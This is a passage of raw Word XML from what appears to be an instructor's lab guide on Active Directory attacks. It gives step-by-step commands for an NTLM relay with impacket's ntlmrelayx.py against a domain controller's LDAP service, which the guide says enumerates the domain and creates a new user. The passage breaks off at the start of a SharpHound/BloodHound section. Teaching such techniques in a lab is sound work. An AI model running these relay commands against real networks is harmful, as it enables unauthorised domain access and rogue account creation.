          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTLM Relay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1AE7C564" w:rsidP="5E1249AA" w:rsidRDefault="1AE7C564" w14:paraId="37F2924D" w14:textId="0E63874E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="45721741">
        <w:rPr/>
        <w:t xml:space="preserve">On the Ubuntu machine, </w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t>Change</w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t xml:space="preserve"> into the </w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t>impacket</w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t xml:space="preserve"> directory and activ</w:t>
      </w:r>
      <w:r w:rsidR="4F90841A">
        <w:rPr/>
        <w:t>ate</w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t>impacket</w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t xml:space="preserve">-env </w:t>
      </w:r>
      <w:r w:rsidR="261CF51C">
        <w:rPr/>
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidR="1AE7C564">
        <w:rPr/>
        <w:t>virtual environment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1AE7C564" w:rsidP="5E1249AA" w:rsidRDefault="1AE7C564" w14:paraId="6C75ACEE" w14:textId="18186FC7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="1AE7C564" w:rsidP="5E1249AA" w:rsidRDefault="1AE7C564" w14:paraId="79E5B184" w14:textId="7968B8B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-env/bin/active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1AE7C564" w:rsidP="5E1249AA" w:rsidRDefault="1AE7C564" w14:paraId="4B34162A" w14:textId="24120168">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>You should now see “(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>-env)” next to terminal prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23B63042" w:rsidP="5E1249AA" w:rsidRDefault="23B63042" w14:paraId="0C81F934" w14:textId="2EFB132B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>virtualenv’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python site-packages path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23B63042" w:rsidP="5E1249AA" w:rsidRDefault="23B63042" w14:paraId="65E5FB36" w14:textId="766B78C1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>python3 -c "import site; print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>site.getsitepackages</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>()[0])"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23B63042" w:rsidP="5E1249AA" w:rsidRDefault="23B63042" w14:paraId="02610C64" w14:textId="6C8980C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>You’ll get something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23B63042" w:rsidP="5E1249AA" w:rsidRDefault="23B63042" w14:paraId="2626E222" w14:textId="7E3D2811">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/home/instructor/impacket/impacket-env/lib/python3.12/site-packages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="23B63042" w:rsidP="5E1249AA" w:rsidRDefault="23B63042" w14:paraId="5B469BB0" w14:textId="2CD99513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="3F8C23F5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>NTLMRelayx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="3F8C23F5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener... (Both blocks can be copied at once)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3F8C23F5" w:rsidP="5E1249AA" w:rsidRDefault="3F8C23F5" w14:paraId="6272F37F" w14:textId="306E535A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> PYTHONPATH=/home/instructor/impacket/impacket-env/lib/python3.12/site-packages python3 ./impacket/examples/ntlmrelayx.py -t ldap://10.0.0.4 -smb2support --no-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>wcf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48214DFD" w:rsidP="16CDA6DC" w:rsidRDefault="48214DFD" w14:paraId="12E4F987" w14:textId="5568ED9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="48214DFD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Windows 10 machine attempt to connect to the “attacker” machine via </w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="48214DFD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="48214DFD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> or http and authenticate as any user when prompted:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="313B36DF" w:rsidP="5E1249AA" w:rsidRDefault="313B36DF" w14:paraId="782F7B34" w14:textId="5DB2E6BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="313B36DF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="313B36DF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">- In a web browser, navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="R5e167d144ddc4558">
        <w:r w:rsidRPr="16CDA6DC" w:rsidR="313B36DF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          </w:rPr>
          <w:t>http://10.0.0.6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="313B36DF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>. Enter credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16CDA6DC" w:rsidP="16CDA6DC" w:rsidRDefault="16CDA6DC" w14:paraId="0C5504DA" w14:textId="5AF72053">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6C2E9519" w:rsidP="5E1249AA" w:rsidRDefault="6C2E9519" w14:paraId="7F6C33AD" w14:textId="77266E39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This will trigger a relay from the Ubuntu machine to the Domain controller. The script will automatically enumerate the domain and attempt to create a new user. These files will be found in:  ~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6C2E9519" w:rsidP="5E1249AA" w:rsidRDefault="6C2E9519" w14:paraId="187FF4F1" w14:textId="12245084">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">To view these file easier, you can create a simple python server in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and host the files out:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7213C6F7" w:rsidP="5E1249AA" w:rsidRDefault="7213C6F7" w14:paraId="4777AACE" w14:textId="34326627">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="7213C6F7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</w:rPr>
        <w:t xml:space="preserve">Python3 –m </w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="7213C6F7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</w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="1D192AA7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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7213C6F7" w:rsidP="5E1249AA" w:rsidRDefault="7213C6F7" w14:paraId="08C4BE1B" w14:textId="3696DEAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Windows 10 machine, open a web browser and navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidRPr="5E1249AA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          </w:rPr>
          <w:t>http://10.0.0.6:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. From here you can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>dowload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and navigate the files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="040FE182" w:rsidP="5E1249AA" w:rsidRDefault="040FE182" w14:paraId="0E063E0B" w14:textId="373A8908">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="040FE182">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Admin Session</w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="675B0E99">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="040FE182">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>- (Bloodhound)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D69DDA4" w:rsidP="16CDA6DC" w:rsidRDefault="7D69DDA4" w14:paraId="17FBD651" w14:textId="2835A00F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="7D69DDA4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="7D69DDA4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>Sharphound</w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="7D69DDA4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="134C083D" w:rsidP="16CDA6DC" w:rsidRDefault="134C083D" w14:paraId="36922B48" w14:textId="40A7DFF1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="134C083D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Windows 10 machine, open CMD and navigate to the Desktop folder. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="134C083D" w:rsidP="16CDA6DC" w:rsidRDefault="134C083D" w14:paraId="1C579F99" w14:textId="6171FC12">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="134C083D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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A509805" w:rsidP="5E1249AA" w:rsidRDefault="7A509805" w14:paraId="6A228E49" w14:textId="43B65D5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
